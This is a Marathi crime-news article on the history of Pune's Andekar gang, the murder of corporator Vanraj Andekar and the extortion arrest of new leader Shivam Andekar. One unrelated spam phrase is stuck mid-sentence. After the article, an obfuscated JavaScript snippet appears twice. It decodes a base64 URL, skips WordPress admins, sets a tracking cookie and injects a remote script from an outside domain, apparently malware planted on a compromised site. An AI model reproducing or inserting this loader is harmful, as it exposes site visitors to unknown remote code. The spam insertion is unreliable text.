आपला महाराष्ट्रक्राईमपुणे

WHO IS SHIVAM ANDEKAR GANG : गुन्हेगारीत आंदेकर गॅंग पुन्हा ऍक्टिव्ह नवा म्होरक्या शिवम आंदेकर कोण आहे ?

WHO IS SHIVAM ANDEKAR GANG :80 च्या दशकापासून पुण्यात खऱ्या अर्थी गॅंग वॉर सुरू करणारी आंदेकर गॅंग गेल्या काही वर्षांपासून थोडी शांत झाल्या सारखी वाटत होती. त्यातच गॅंगचा प्रमुख बंडू आंदेकर वृद्धाप काळामुळे गुन्हेगारीत सक्रिय नव्हता त्यानंतर त्याचाच मुलगा माजी नगरसेवक वनराज आंदेकरचा खून झाल्यानंतर ही गॅंग संपली असंच वाटत होतं. मात्र आता समोर आलेल्या माहितीनुसार आंदेकर गॅंगला टोळी प्रमुख मिळाला आहे. how old is camilla araujo ज्याचं नाव आहे शिवम आंदेकर.WHO IS SHIVAM ANDEKAR GANG : आंदेकर गॅंगचा नवा प्रमुख शिवम आंदेकर कोण आहे ?
1980 च्या दशकात केवळ मुंबईपुरत्या मर्यादित असलेल्या गॅंगवॉरचे वारे पुण्यातही वाहू लागले.

बाळु आंदेकर आणि प्रमोद माळवदकर या सराईत गुन्हेगारांनी आपापल्या टोळ्या तयार केल्या.

या दोन टोळ्यांमध्ये वर्चस्वाची लढाई सुरु झाली. आंदेकर टोळीने प्रमोद माळवदकर याच्या वडिलांचा खून केला.

त्याचा बदला घेण्यासाठी माळवदकर टोळीने शिवाजीनगर कोर्टाच्या आवारात बाळू आंदेकर याचा 17 जुलै 1984 रोजी खून केला.

त्यातून पुण्यात पहिल्यांदाच दोन टोळ्यांमधील गँगवॉर भडकलं. या गँगवॉरमध्ये 6 गुंड मारले गेले होते.

त्यानंतर पुणे पोलीस दलातील गुन्हे शाखेच्या पथकाने काळेवाडी परिसरात 19 नोव्हेंबर 1997 रोजी गुंड प्रमोद माळवदकर याचं इन्काऊंटर केलं.

VANRAJ ANDEKAR MURDER: एका फोनवर आरोपी जमले, हत्यारं जमवली अन् वनराजचा केला “गेम”; वाचा वनराज आंदेकरांच्या खुनाची संपूर्ण INSIDE STORY

त्यानंतर माळवदकर टोळी जवळपास नामशेष झाली. मात्र आंदेकर टोळी वेगाने वाढू लागली. बाळू आंदेकर याच्यानंतर सूर्यकांत ऊर्फ बंडु आंदेकर याच्याकडे आंदेकर टोळीची सुत्रे गेली.

1992 च्या महानगरपालिका निवडणुकांमध्ये ही टोळी गुन्हेगारीतून थेट राजकारणात शिरली.

आधी उदयकांत आंदेकर मग वत्सला आंदेकर, त्यानंतर टोळीप्रमुख बंडू आंदेकर याची पत्नी राजश्री आंदेकर आणि नंतर त्यांचा मुलगा वनराज आंदेकर असे चार नगरसेवक या कुटुंबात होऊन गेले.

राजकारणात आल्यानंतर आंदेकर कुटुंबातील सदस्यांनी गुन्हेगारांशी संबंध कमी केले. मात्र हे संबंध कधीही संपले नाहीत.

राजकारणात आंदेकर कुटुंब स्थिरस्थावर होत असताना दुसरीकडे टोळी प्रमुख बंडू आंदेकर त्याला फरासखाना पोलीस ठाण्याअंतर्गत केलेल्या

एका खूनाच्या गुन्ह्यात जन्मठेपेची शिक्षा झाली. त्यानंतर टोळीचा गुन्हेगारीतील सहभाग कमी झाला. मात्र त्यावेळी बंडू आंदेकरचा मुलगा वनराज आणि कृष्णा या भावांनी टोळीची सूत्र खाली घेतली.

या दोघांवर अनेक गुन्हे दाखल झाले. दोघांना 2009 मध्ये तडीपार देखील करण्यात आले.

मात्र बंडू आंदेकरचा मुलगा वनराज यांनी राष्ट्रवादी काँग्रेस पक्षात प्रवेश केला. ते नगरसेवक म्हणून निवडून आले. गुन्हेगारी सोडून राजकारणात रमले. मागच्याच वर्षी वनराज यांच्या सख्ख्या बहिणीनं कौटुंबिक वादातून विरोधी टोळीची मदत घेऊन वनराज यांचा भर चौकात गोळ्या घालून आणि कोयत्याने वार करून खून केला. त्यानंतर पुन्हा पुण्यात टोळी युद्ध भडकेल अशी शक्यता वाटत असताना टोळी प्रमुख बंडू आंदेकरनं आम्ही न्याय मिळवण्यासाठी न्यायालयीन लढाई लढणार आहोत, आम्ही वनराजच्या हत्येचा बदला घेणार नाही, असं स्पष्ट केलं. त्यानंतर ही टोळी लोप पावत असल्यासारखं वाटत होतं. मात्र तेवढ्यात एन्ट्री झाली नव्या टोळी प्रमुखाची. शिवम आंदेकर हा सध्या या टोळीची सूत्र सांभाळत असल्याची माहिती समोर आली आहे. शिवम हा माजी नगरसेवक उदयकांत आंदेकर यांचा मुलगा आहे. तो आंदेकर टोळीत गेल्या काही वर्षांपासून सक्रिय आहे. त्याच्यावर खंडणी, मारामारी आणि धमकावणे यांसारख्या गंभीर गुन्ह्यांची नोंद आहे. त्याच्या वाढत्या गुन्ह्यांची संख्या पाहून 2020 मध्ये त्याला तडीपार करण्यात आलं होतं. 2021मध्ये, पाषाण येथे कार अडवल्याच्या रागातून त्याने पोलिसांशी वाद घातले. यावेळी त्याने पोलिसांना शिवीगाळ करत धक्काबुक्कीही केली होती. त्यावेळी त्याच्यावर गुन्हा दाखल झाला होता. वृद्धापकाळमुळे थकलेल्या आणि मुलाच्या जाण्याने खचलेल्या बंडू आंदेकर यांच्याकडून टोळीची सूत्र आता शिवम याने हाती घेतल्याची माहिती समोर येत आहे. हाच शिवम वनराज यांचा खून झाला यावेळी तिथे उपस्थित होता. मात्र जीव मुठीत घेऊन पळाल्याने तो वाचला आणि वनराज यांचा खून झाला. तेव्हापासून हा शिवम आंदेकर आणि टोळी पुन्हा चर्चेत आली आहे.शिवम आंदेकर याला खंडणीच्या गुन्ह्यात अटक करण्यात आली आहे. गेल्या आठ वर्षांपासून शिवम याच्या सांगण्यावरून त्याचा साथीदार आकाश परदेशी हा दर महा 50 हजार रुपये मच्छी व्यवसायिकाकडून आणायचा. अखेर 48 लाख गमावल्यानंतर या व्यवसायाने पैसे द्यायला नकार दिला. त्यामुळे शिवम आणि टोळीने मिळून व्यावसायिकाचा 90 हजारांचं साहित्य रस्त्यावर फेकून दिलं. त्यानंतर जबरदस्ती सर्व वस्तू टेम्पो भरून घेऊन गेले. या प्रकरणी घाबरलेल्या व्यवसायिकानं फरासखाना पोलीस ठाण्यात गुन्हा दाखल केला. त्या आधारे शिवम आंदेकर याला अटक करण्यात आली आहे. मात्र या प्रकरणामुळे आंदेकर गॅंग पुण्यात पुन्हा ऍक्टिव्ह झाल्याच्या चर्चा सुरू झाल्या आहेत. त्यामुळेच पोलीस शिवम याच्यावर कडक कारवाई करत आहेत.

 (function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9+/=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9+/=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();